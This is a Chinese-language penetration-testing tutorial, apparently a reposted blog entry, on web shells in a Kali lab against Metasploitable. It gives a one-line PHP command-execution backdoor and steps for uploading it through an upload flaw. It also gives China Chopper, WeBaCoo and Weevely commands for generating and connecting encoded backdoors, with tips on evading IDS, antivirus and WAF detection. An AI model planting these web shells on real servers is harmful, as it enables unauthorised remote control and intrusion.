小白日記51:kali滲透測試之Web滲透-WebShell(中國菜刀、WeBaCoo、Weevely)

來源:互聯網
上載者:User

標籤:內網   size   base64編碼   壓縮   滲透測試   cmd   技術分享   平台   官網   

webshell

本質:<?php echo shell_exec($_GET[‘cmd‘]);?>

windows平台

中國菜刀官網:胖用戶端程式,國產中比較優秀的webshell,適用性較強  【但版本眾多而亂,可能存在木馬,據說的官網http://www.maicaidao.co/】

1、利用上傳漏洞,先上傳一句話木馬【支援三種伺服器端PHP、ASP、ASP.NET】

使用ssh串連metasploitable

建立包含木馬代碼的檔案

2、串連相應的伺服器端

添加伺服器端URL  【密碼為一句話木馬中的參數】

雙擊進入檔案管理介面

 

也可以進入命令列模式【虛擬終端】  {許可權只為web程式的運行許可權}

 

可能被IDS、AV、WAF、掃描器軟體發現查殺  【可編碼免殺】

kali平台下的webshell,本質與中國菜刀類似,有編碼功能,可避免被查殺

WeBaCoo(Web Backdoor Cookie)【只對PHP】

擷取的是類終端的shell

編碼通訊內容通過cookie頭傳輸,隱蔽性較強

參數:

cm:base64編碼的命令

cn:伺服器用於返回資料的cookie頭的名

cp:返回資訊定界符

1、產生伺服器端

wenacoo -g -o a.php

##利用scp上傳到metaspolitable的伺服器根目錄

移動webacoo.php到web根目錄

2、使用用戶端進行串連

webacoo -t -u http://1.1.1.1/a.php

##抓包分析如何通過cookie頭傳指令,手動觸發流量  【cm/cn/cp】

 

 其他參數

webacoo -h

 

Weevely  【使用http頭進行指令(經過編碼)傳輸】

隱形類終端PHP Webshell

有30多個管理模組

執行系統命令、瀏覽檔案系統

檢查伺服器常見配置錯誤

建立正向、反向TCP Shell串連

通過目標電腦代理HTTP流量

從目標電腦運行連接埠掃描,滲透內網

 支援串連密碼

*****************************************************************

##kali中缺少庫

https://pypi.python.org/pypi/PySocks/  【下載庫檔案壓縮包】

./setup.py install

**************************************************************************************** 

 1、產生服務端  【產生經過編碼的木馬】

weevely generate <password> <path>

 

##上傳木馬

 

 2、串連用戶端

weevely <URL> <password> [cmd]

 

 

 3、模組

help

 

 

小白日記51:kali滲透測試之Web滲透-WebShell(中國菜刀、WeBaCoo、Weevely)

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.